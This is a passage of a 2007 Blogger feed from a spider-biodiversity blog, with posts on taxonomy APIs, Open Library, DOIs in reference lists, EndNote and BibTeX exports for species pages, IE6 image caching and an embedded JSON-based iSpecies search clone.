So, you could use this API as a very simple way to eyeball 2+ simultaneous classifications. The caveat of course is that GBIF must make these available in the API. So, hats off to GBIF and Dave Martin. These are very useful and important APIs.&lt;br /&gt;&lt;br /&gt;Last month, &lt;a href="http://lists.tdwg.org/pipermail/tdwg/2007-September/000258.html"&gt;I proposed&lt;/a&gt; that the Biodiversity Informatics community develop a programmableweb.com clone called programmablebiodiversity.org. There are more and more biodiversity-related APIs available, many of which produce JSON in addition to the usual XML documents via REST. Surely people more clever than me could produce presentational &amp; analytical gadgets if there were a one-stop-shop for all the APIs and a showcase for what people are doing with these data services. The response from TDWG was lukewarm. I think there's a time and place for development outside the busy work of standards creation. But, there were a few very enthusiastic responses from Tim Robertson, Donald Hobern, Lee Belbin, Vince Smith and a few others. It turns out that Markus Döring and the EDIT team in Berlin have been creating something approaching my vision called BD (Biodiversity) Tracker at &lt;a href="http://www.bdtracker.net"&gt;http://www.bdtracker.net&lt;/a&gt;. I just hope they clean it up and extend it to approximate the geekery in programmableweb.com with some clean cut recipes for people to dive into using APIs like this. [Aside: Is it just me or are all the Drupal templates starting to look a little canned and dreary?]&lt;br /&gt;&lt;br /&gt;There's plenty more I want to do with this JSON-based PygmyBrowse so if you have ideas or suggestions, by all means drop a comment. 
Rod wants to contribute this code to an open-source repository &amp; I'll be sure to contribute this as a subproject.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-23452652721988975?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/23452652721988975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=23452652721988975' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/23452652721988975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/23452652721988975'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/pygmybrowse-classification-tree-api.html' title='PygmyBrowse Classification Tree API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RxW5q4CWvNI/AAAAAAAAAE0/_e7Mdc2aDFs/s72-c/trees.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4410985641514569679</id><published>2007-10-03T03:00:00.000-06:00</published><updated>2007-10-03T04:17:04.910-06:00</updated><title type='text'>The Open Library</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s1600-h/front_page.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" 
src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s320/front_page.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5117042063261106626" /&gt;&lt;/a&gt;&lt;br /&gt;I stumbled on an amazing new project led by &lt;a href="http://www.aaronsw.com/"&gt;Aaron Swartz&lt;/a&gt; called the &lt;a href="http://demo.openlibrary.org/"&gt;Open Library&lt;/a&gt; - not to be confused with this &lt;a href="http://www.openlibrary.org/"&gt;Open Library&lt;/a&gt; though there appears to be some resemblance. What strikes me about Aaron's project is that it is so relevant to &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; it scares me that I hadn't yet heard of it. According to their "About the technology" page:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Building Open Library, we faced a difficult new technical problem. We wanted a database that could hold tens of millions of records, that would allow random users to modify its entries and keep a full history of their changes, and that would hold arbitrary semi-structured data as users added it. Each of these problems had been solved on its own, but nobody had yet built a technology that solved all three together.&lt;/blockquote&gt;&lt;br /&gt;The consequence of all this is that there is a front-facing page for every book with the option to edit the metadata. All versioning and users are tracked. The content of the "&lt;a href="http://demo.openlibrary.org/about"&gt;About Us&lt;/a&gt;" page sounds eerily like E. O. Wilson's proclamations in his 2003 opinion piece in TREE (&lt;a href="http://dx.doi.org/10.1016/S0169-5347(02)00040-X"&gt;doi:10.1016/S0169-5347(02)00040-X&lt;/a&gt;). For those of you who don't recognize the name Aaron Swartz, he's the whiz behind a lot of important functionality on the web we see today. 
It's also worth reading his multi-part thoughts on the spirit of &lt;a href="http://www.aaronsw.com/weblog/wikiroads"&gt;Wikipedia&lt;/a&gt; and why it may soon hit a wall.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4410985641514569679?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4410985641514569679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4410985641514569679' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4410985641514569679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4410985641514569679'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/open-library.html' title='The Open Library'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s72-c/front_page.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1250966238359263816</id><published>2007-09-30T00:06:00.000-06:00</published><updated>2007-10-25T13:33:05.192-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>DOIs in the References Cited Section</title><content type='html'>I just read a &lt;a 
href="http://www.crossref.org/CrossTech/2007/09/styles_guides_recommend_doi_1.html"&gt;recent post&lt;/a&gt; by Ed Pentz (Executive Director of &lt;a href="http://www.crossref.org"&gt;CrossRef&lt;/a&gt;) who alerted his readers to some recent changes to recommended &lt;a href="https://catalog.ama-assn.org/Catalog/product/product_detail.jsp?productId=prod1020022?checkXwho=done"&gt;American Medical Association&lt;/a&gt; and &lt;a href="http://apastyle.apa.org/"&gt;American Psychological Association&lt;/a&gt; style guides. Ed also provides two examples. Essentially, a string like "doi:10.1016/j.ssresearch.2006.09.002" is to be tagged at the end of each reference (if these DOIs exist) in the literature cited section of journals that use AMA or APA styles. Cool! It would be a snap to write a JavaScript to recognize "doi:" on a page and magically add the "http://dx.doi.org/" and I have no doubt publishers can do something similar prior to producing PDF reprints. Ed seemed puzzled by the exclusion of "http://dx.doi.org/", but this is a really smart move by the AMA and the APA. DOIs after all are URNs so it's best to avoid any confusion. If paper publishers want to make these actionable, then they can do so. If web publishers want to do the same, then a simple little JavaScript can do it.&lt;br /&gt;&lt;br /&gt;So, what we need now are style editors to pick up this recommendation across the board in all journals in all disciplines. This simple addition would do a world of good for human discoverability and for machine consumption/repurposing. It shouldn't just be a recommendation, it should be mandatory.&lt;br /&gt;&lt;br /&gt;Hopefully, this will step up the drive for including XMP metadata within PDF reprints. It may be a pain for authors to track down DOIs if they're not stamped on the covering page (usually hovering around the abstract or the very top of the page) and consequently, adoption of this new recommendation may be rather slow. 
If the DOI were embedded in the XMP, then reference managers like EndNote and RefMan could naturally read these metadata. In other words, building your reference collection would be as simple as dropping a PDF in a watched file folder and letting your reference manager do the rest. This would also open the door to zero local copies of PDFs or an intelligent online storage system. EndNote and RefMan need only have the DOI and they can pull the rest using CrossRef's DOI look-up services.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1250966238359263816?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1250966238359263816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1250966238359263816' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1250966238359263816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1250966238359263816'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/dois-in-references-cited-section.html' title='DOIs in the References Cited Section'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1385024241116841999</id><published>2007-09-27T22:15:00.000-06:00</published><updated>2007-10-06T14:03:15.838-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
term='peer-review'/><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Would You Cite a Web Page?</title><content type='html'>Species pages in &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt; are peer-reviewed in the very traditional sense. But, instead of doling out pages that need to be reviewed, I leave it up to authors to anonymously review each other's work. Not just anyone can author a species page; you at least need to show me that you have worked on spiders in some capacity. Once three reviews for any page have been received and the author has made the necessary changes (I &lt;em&gt;can&lt;/em&gt; read who wrote what and when), I flick the switch and the textual contributions by the author are locked. There is still dynamically created content on these species pages like maps, phenological charts, State/Province listings, etc. However, at the end of the day, these are still just web pages, though you can download a PDF if you really want to.&lt;br /&gt;&lt;br /&gt;Google Scholar allows you to set your preferences for downloading an import file for &lt;a href="http://www.bibtex.org/"&gt;BibTex&lt;/a&gt;, &lt;a href="http://www.endnote.com/"&gt;EndNote&lt;/a&gt;, &lt;a href="http://www.refman.com/"&gt;RefMan&lt;/a&gt;, &lt;a href="http://www.refworks.com/"&gt;RefWorks&lt;/a&gt;, and WenXianWang so I thought I would duplicate this functionality for species pages in The Nearctic Spider Database, though limited to BibTex and EndNote. I'm not at all familiar with the last three reference managers and I suspect they are not as popular as EndNote and BibTex. Incidentally, Thomson puts out both EndNote and RefMan and recently, they released &lt;a href="http://www.endnoteweb.com/"&gt;EndNoteWeb&lt;/a&gt;. As cool as EndNoteWeb looks, Thomson has cut it off at the knees by limiting the number of references you can store in an online account to 10,000. 
Anyone know anything about WenXianWang? I couldn't find a web site for that application anywhere. So, here's how it works:&lt;br /&gt;&lt;br /&gt;First, it's probably a good idea to set the MIME types on the server though this is likely unnecessary because these EndNote and BibTex files are merely text files:&lt;br /&gt;&lt;br /&gt;EndNote: application/x-endnote-refer (extension .enw)&lt;br /&gt;BibTex: ?? (extension .bib)&lt;br /&gt;&lt;br /&gt;Second, we need to learn the contents of these files:&lt;br /&gt;&lt;br /&gt;EndNote: called "tagged import format" where fields are designated with a two-character code that starts with a % symbol (e.g. %A). After the field code, there is a space, and then the contents. It was a pain in the neck to find all these but at least the University of Leicester put out a Word document &lt;a href="http://www.le.ac.uk/library/downloads/endnotetaggedfile.doc"&gt;HERE&lt;/a&gt;. Here's an example of the file for a species page in The Nearctic Spider Database:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;%0 Web Page&lt;br /&gt;%T Taxonomic and natural history description of FAM: THOMISIDAE, Ozyptila conspurcata Thorell, 1877.&lt;br /&gt;%A Hancock, John&lt;br /&gt;%E Shorthouse, David P.&lt;br /&gt;%D 2006&lt;br /&gt;%W http://www.canadianarachnology.org/data/canada_spiders/&lt;br /&gt;%N 9/27/2007 10:40:40 PM&lt;br /&gt;%U http://www.canadianarachnology.org/data/spiders/30843&lt;br /&gt;%~ The Nearctic Spider Database&lt;br /&gt;%&gt; http://www.canadianarachnology.org/data/spiderspdf/30843/Ozyptila%20conspurcata&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;BibTex: Thankfully, developers at BibTex recognize the importance of good, simple documentation and have a page devoted to the &lt;a href="http://www.bibtex.org/Format/"&gt;format&lt;/a&gt;. But, the examples for reference type are rather limited. Again, I had to go on a hunt for more documentation. 
What was of great help was the documentation for the &lt;a href="http://www.dante.de/CTAN//biblio/bibtex/contrib/apacite/apacite.pdf"&gt;apacite package&lt;/a&gt;, which outlines the rules in use by the American Psychological Association. In particular, pp. 15-26 of that PDF were what I needed. &lt;strong&gt;However, where's the web page reference type?&lt;/strong&gt; Most undergraduate institutions in North America still enforce a no web page citation policy on submitted term papers, theses, etc. so it really wasn't a surprise to see no consideration for web page citations. So, what is the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; to do? The best format I could match for EndNote's native handling of web pages was the following:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;@misc{hancock30843,&lt;br /&gt;author = {Hancock, John},&lt;br /&gt;title = {Taxonomic and natural history description of FAM: THOMISIDAE, Ozyptila conspurcata Thorell, 1877.},&lt;br /&gt;editor = {Shorthouse, David P.},&lt;br /&gt;howpublished = {World Wide Web electronic publication},&lt;br /&gt;type = {web page},&lt;br /&gt;url = {http://www.canadianarachnology.org/data/spiders/30843},&lt;br /&gt;publisher = {The Nearctic Spider Database},&lt;br /&gt;year = {2006}&lt;br /&gt;}&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Now, BibTex is quite flexible in its structure so there could very well be a proper way to do this. But, the structure must be recognized by the rule-writing templates like APA otherwise it is simply ignored.&lt;br /&gt;&lt;br /&gt;The EndNote download is available at the bottom of every authored species page in the database's website via a click on the EndNote icon (example: &lt;a href="http://www.canadianarachnology.org/data/spiders/30843"&gt;http://www.canadianarachnology.org/data/spiders/30843&lt;/a&gt;). 
I have no idea if the BibTex format above is appropriate so I welcome some feedback before I enable that download.&lt;br /&gt;&lt;br /&gt;But, all this raises a question...&lt;br /&gt;&lt;br /&gt;Would you import a reference to a peer-reviewed web page into your reference managing programs and, if you are an educator, should you consider allowing undergraduates an opportunity to cite such web pages? Would you yourself cite such pages? Do we need a generic, globally recognized badge that exclaims "peer-reviewed" on these kinds of pages? Open access does not mean content is not peer-reviewed or any less scientific. Check out some myth-busting &lt;a href="http://www.biomedcentral.com/openaccess/inquiry/myths/?myth=all"&gt;HERE&lt;/a&gt;. What if peer-reviewed web pages had DOIs, thus taking a great leap away from URL rot and closer toward what Google does with its index - calculations of page popularity? Citation rates (&lt;em&gt;i.e.&lt;/em&gt; popularity) are but one outcome of the DOI model for scientific papers. If I anticipated a wide, far-reaching audience for a publication, I wouldn't care two hoots if it was freely available online as flat HTML, a PDF, or as MS Word or if the journal (traditional or non-traditional) has a high impact factor as &lt;a href="http://www.sciencegateway.org/impact/"&gt;mysteriously calculated&lt;/a&gt; by, you guessed it, Thomson ISI. 
If DOIs are the death knell for journal impact factors, are web pages the death knell for paper-only publications?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1385024241116841999?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1385024241116841999/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1385024241116841999' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1385024241116841999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1385024241116841999'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/would-you-cite-web-page.html' title='Would You Cite a Web Page?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7866410298406059331</id><published>2007-09-26T00:05:00.000-06:00</published><updated>2007-09-26T02:01:05.459-06:00</updated><title type='text'>IE6 is Crap By Design</title><content type='html'>I give up. I have had it. Internet Explorer 6 absolutely sucks.&lt;br /&gt;&lt;br /&gt;Since I first started toying with JavaScript and using .innerHTML to dynamically add, change, or remove images on a web page in response to a user's actions or at page load (e.g. 
search icons &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;tagged at the end of scientific references&lt;/a&gt; to coordinate user click-to-check existence of DOI, Handle, or PDF via Rod Page's JSON reference parsing web service at &lt;a href="http://bioGUID.info"&gt;bioGUID.info&lt;/a&gt;), I have struggled with the way this version of the browser refuses to cache images.&lt;br /&gt;&lt;br /&gt;If multiple, identical images are inserted via .innerHTML, IE6 makes a call to the server for every single copy of the image. Earlier and later versions of IE do not have this problem; these versions happily use the cache as it's meant to be used and do not call the server for yet another copy of an identical image. I have tried everything I can think of from preloading the image(s), using the DOM (&lt;em&gt;i.e.&lt;/em&gt; .appendChild()), server-side tricks, &lt;em&gt;etc.&lt;/em&gt; but nothing works. Page loads are slow for these users and the appended images via .innerHTML may or may not appear, especially if there are a lot of successive .innerHTML calls. Missing images may or may not appear with a page refresh and images that were once present may suddenly disappear with a successive page refresh. Because AJAX is becoming more and more popular and, as a consequence, there are more instances of .innerHTML = "&amp;lt;img src='...'&amp;gt;" in loops, don't these people think something is not right with their browser? I doubt it. 
Instead, I suspect they think something is wrong with the web page and likely won't revisit.&lt;br /&gt;&lt;br /&gt;Here's some example code that causes the problem for an IE6 user:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;...&lt;br /&gt;for (var i=0;i&amp;lt;foo;i++) {&lt;br /&gt;bar.innerHTML = "&amp;lt;img src='...'&amp;gt;";&lt;br /&gt;}&lt;br /&gt;...&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Web server log lines like the following (abridged to protect the visitor to The Nearctic Spider Database) fill 10-20% of the daily log files:&lt;br /&gt;&lt;div style="font-size:x-small"&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;GET /bioGUID/magnifier.png - 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;...etc...)&lt;br&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;So, I wonder how much bandwidth on the Internet superhighway is consumed by this terrible design flaw? Microsoft is aware of the issue, but weakly tried to convince us that this behaviour is "by design" as can be read in their &lt;a href="http://support.microsoft.com/default.aspx?scid=kb;en-us;319546"&gt;Knowledge Base Article Q319546&lt;/a&gt;. Give me a break. 
The solution in that article is pathetic and doesn't work.&lt;br /&gt;&lt;br /&gt;Depending on what you do in your JavaScript, you can either force an HTTP status code of 200 OK (&lt;em&gt;i.e.&lt;/em&gt; image is re-downloaded, thus consuming unnecessary bandwidth) or an HTTP status code of 304 Not Modified ("you already got it dummy, I'm not sending it again" - but still &lt;em&gt;some&lt;/em&gt; bandwidth). Though I haven't yet investigated before/after in my web logs, others have reported that the following code at the start of some JavaScript will force a 304:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;try {&lt;br /&gt;  document.execCommand("BackgroundImageCache", false, true);&lt;br /&gt;} catch(err) {}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I'm not convinced that this will work.&lt;br /&gt;&lt;br /&gt;After pulling my hair out for 2+ years trying to come up with a work-around, I have concluded that the only way this problem can be prevented is if the user adjusts how their own cache works. If you are an IE6 user, see the &lt;a href="http://ahinea.com/en/tech/ie-dhtml-image-caching.html"&gt;note by Ivan Kurmanov&lt;/a&gt; on how to do this (incidentally, Ivan's server-side tricks also don't work). In a nutshell, if you use IE6, DO NOT choose the "Every visit to the page" option in your browser's cache settings. Unfortunately, there is no way for a developer to detect a user's cache settings. Like pre-IE6 and post-IE6 users, people with IE6 whose cache is set to check for newer content "Automatically", "Never" or "Every time you start Internet Explorer" also do not have this problem.&lt;br /&gt;&lt;br /&gt;Developers (&lt;a href="http://www.bazon.net/mishoo/Articles/msie/958/"&gt;like Mishoo&lt;/a&gt;) have suggested that this "by design" flaw is a means for Microsoft to artificially inflate its popularity in web server log analyses. But, I doubt analysis software confuses multiple downloads from the same IP address with browser popularity. 
So how can this possibly be by design if there is no way for a developer to circumvent it? Who knows.&lt;br /&gt;&lt;br /&gt;The only real solution I have been able to dream up, though I haven't implemented it, is to perform a JavaScript browser version check. If people choose to use IE6 and don't upgrade to IE7 then they won't get the added goodies. I certainly don't want to degrade their anticipated experience, but I also have to think about cutting back on pushing useless bandwidth, which is not free. If you insist on using IE, please &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9ae91ebe-3385-447c-8a30-081805b2f90b&amp;DisplayLang=en"&gt;upgrade to IE7&lt;/a&gt;. This version of the browser was released a year ago. Better yet, make the switch to &lt;a href="http://www.mozilla.com/en-US/firefox/"&gt;Firefox&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7866410298406059331?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7866410298406059331/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7866410298406059331' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7866410298406059331'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7866410298406059331'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/ie6-is-crap-by-design.html' title='IE6 is Crap By Design'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1365168045518383855</id><published>2007-09-25T17:29:00.000-06:00</published><updated>2007-09-25T19:04:06.607-06:00</updated><title type='text'>Google Search JSON API</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s1600-h/code_sm.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s320/code_sm.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5114288360264193970" /&gt;&lt;/a&gt; Google is obviously producing JSON outputs from most (if not all) of its search offerings because they have an API called "&lt;a href="http://code.google.com/apis/ajaxsearch/"&gt;Google AJAX Search API&lt;/a&gt;". Signing up for a key allows a developer to pull search results for use on web pages in a manner identical to my &lt;a href="http://canadianarachnology.dyndns.org/iSpecies/"&gt;iSpecies Clone&lt;/a&gt;. However, it is an absolute pain in the neck to use this API. It is nowhere near as useful as &lt;a href="http://developer.yahoo.com/"&gt;Yahoo's web services&lt;/a&gt;. Google goes to great lengths to obfuscate the construction of its JSON outputs and these are produced from RESTful URLs, buried deep in its JavaScript API. So, I went on a hunt...&lt;br /&gt;&lt;br /&gt;Within a JavaScript file called "uds_compiled.js" that gets embedded in the page via the API, there are several functions, which are (somewhat) obvious:&lt;br /&gt;GwebSearch(), GadSenseSearch(uds), GsaSearch(uds) [aside: Is this Google Scholar? 
There is no documentation in the &lt;a href="http://code.google.com/apis/ajaxsearch/"&gt;API how-to&lt;/a&gt;], GnewsSearch(), GimageSearch(), GlocalSearch(), GblogSearch(), and finally GbookSearch().&lt;br /&gt;Since all these functions are called from JSON with an on-the-fly callback, why make this so difficult? If I had some time on my hands, I'd deobfuscate the API to see how the URLs are constructed such that I could reproduce Yahoo's API. Incidentally, I just now noticed that Yahoo has an optional parameter in its API called "site" whereby one can limit the search results to a particular domain (e.g. site=wikipedia.org).&lt;br /&gt;&lt;br /&gt;So Google, if you are now producing an API like AJAX Search, why make it so difficult and force the output into a Google-based UI? Developers just want the data. You could just as easily force a rate limit as does Yahoo for its API: 5,000 queries per IP per day per API. Problem solved.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1365168045518383855?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1365168045518383855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1365168045518383855' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1365168045518383855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1365168045518383855'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/google-search-json-api.html' title='Google Search JSON API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RvmaKsB2V7I/AAAAAAAAAEk/rV0lrz8VTx8/s72-c/code_sm.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5778181358759010529</id><published>2007-09-25T02:58:00.000-06:00</published><updated>2007-10-06T14:06:15.765-06:00</updated><title type='text'>iSpecies Clone</title><content type='html'>For kicks, I created an iSpecies clone that uses nothing but JSON. Consequently, there is no server-side scripting and the entire "engine" if you will is within one 12KB external JavaScript file. The actual page is flat HTML. What this means is that you can embed the engine on any web page, including &lt;em&gt;&amp;lt;&amp;lt;ahem&amp;gt;&amp;gt;&lt;/em&gt; Blogger. You can try it out yourself here: &lt;a href="http://www.canadianarachnology.org/iSpecies/"&gt;iSpecies Clone&lt;/a&gt;. 
Or live:&lt;br /&gt;&lt;script src="http://www.canadianarachnology.org/iSpecies/files/json.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div id="search_header"&gt;&lt;div style="MARGIN-LEFT: auto; WIDTH: 475px; MARGIN-RIGHT: auto"&gt;&lt;form action="http://ispiders.blogspot.com/2007/09/ispecies-clone.html" method="get"&gt;&lt;div id="iSpeciesSearch" name="iSpeciesSearch"&gt;&lt;img alt="iSpecies" src="http://canadianarachnology.dyndns.org/iSpecies/files/iSpecies.png" /&gt;&lt;br /&gt;&lt;input size="40" name="species"&gt; &lt;input type="submit" value="Search!"&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="searchedTerm"&gt;&lt;/div&gt;&lt;div id="spinner"&gt;&lt;/div&gt;&lt;div id="refine"&gt;&lt;/div&gt;&lt;div id="results"&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s1600-h/logo.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5114067409966618514" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s320/logo.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Rod Page was the first to create a semi taxonomically-based search engine called &lt;a href="http://darwin.zoology.gla.ac.uk/~rpage/ispecies/"&gt;iSpecies&lt;/a&gt; (see &lt;a href="http://ispecies.blogspot.com/"&gt;iSpecies blog&lt;/a&gt;) that uses web services. He recently gave 